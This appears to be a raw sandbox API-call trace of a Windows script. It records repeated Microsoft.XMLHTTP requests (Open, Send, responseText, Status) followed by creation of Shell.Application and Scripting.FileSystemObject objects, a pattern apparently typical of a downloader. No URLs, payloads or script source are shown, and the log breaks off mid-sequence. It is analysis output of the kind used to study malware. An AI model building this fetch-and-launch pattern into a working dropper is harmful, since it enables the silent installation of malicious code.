	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0348.670] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.670] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.670] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0350.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0350.304] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0350.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0350.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0350.304] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0350.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0350.304] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0350.305] SysStringLen (param_1=0x0) returned 0x0
	[0350.305] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0350.305] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0350.305] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0350.305] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0350.305] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0350.305] ??2@YAPEAX_K@Z () returned 0x62f350
	[0350.305] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0350.305] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0350.305] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0350.305] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0350.305] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0350.305] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0350.305] SysStringLen (param_1=0x0) returned 0x0
	[0350.305] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0350.309] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0350.309] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0350.309] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0350.309] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0350.309] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0350.309] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0359.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0359.463] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0359.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0359.465] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.465] SysStringLen (param_1=0x0) returned 0x0
	[0359.465] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.465] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0359.465] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0359.465] ??2@YAPEAX_K@Z () returned 0x62f310
	[0359.465] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0359.465] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.465] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0359.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0359.466] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0359.466] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.466] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.468] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.468] SysStringLen (param_1=0x0) returned 0x0
	[0359.468] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.468] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0359.468] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0359.469] ??2@YAPEAX_K@Z () returned 0x62f330
	[0359.469] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.469] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0359.469] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.469] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.469] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.469] SysStringLen (param_1=0x0) returned 0x0
	[0359.469] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.469] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0359.469] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7778) returned 0x0
	[0359.470] ??2@YAPEAX_K@Z () returned 0x62f310
	[0359.470] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7778, pUnkSite=0x62f310) 
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.470] XMLHTTPRequest:IUnknown:Release (This=0x49c7778) returned 0x0
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0359.470] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.470] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.470] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.470] SysStringLen (param_1=0x0) returned 0x0
	[0359.470] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.470] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0359.470] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0359.470] ??2@YAPEAX_K@Z () returned 0x62f330
	[0359.471] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0359.471] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.471] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
